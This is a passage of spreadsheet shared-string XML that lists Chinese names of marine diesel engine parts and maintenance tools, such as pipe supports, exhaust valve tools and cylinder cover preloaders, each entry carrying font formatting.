      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶手支柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>覆膜阻燃环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆端球面接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖研磨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套孔检查测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具示意图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具箱组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>攻丝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头端子螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支撑组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚柱支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>虎钳夹头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向手柄杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向手柄中心轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环槽测量仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙防脱落工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头外形模板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞用千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基准表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加固轴套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹紧套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检修台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡套接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡套接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空心螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速泄放阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水泄放罐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合叉机加图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆上轴瓦预紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆下轴瓦预紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆装配工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量开关组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角头螺塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹套管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋式接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱焊接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内外环垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀拆卸翻转台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀驱动下部滚轮销组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀箱预紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀泄放回收管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管包装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴量规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀节装卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏心销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气进口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀研磨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸底部排水管方形垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖预紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸剪切工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动端中间体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃料阀泄放支管蒸汽伴热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃料喷射阀测试装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷射阀拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泄漏报警箱总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管连接组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软性绝缘层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>深度千分表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销轴承取出示意图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚衬片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄位置牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄指向</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双舌垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双头扳手开口端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函装配工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动齿轮检查孔盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>万向节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置盘螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬梁焊接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预紧器基础工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具盖板布置图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽伴热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>终端管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
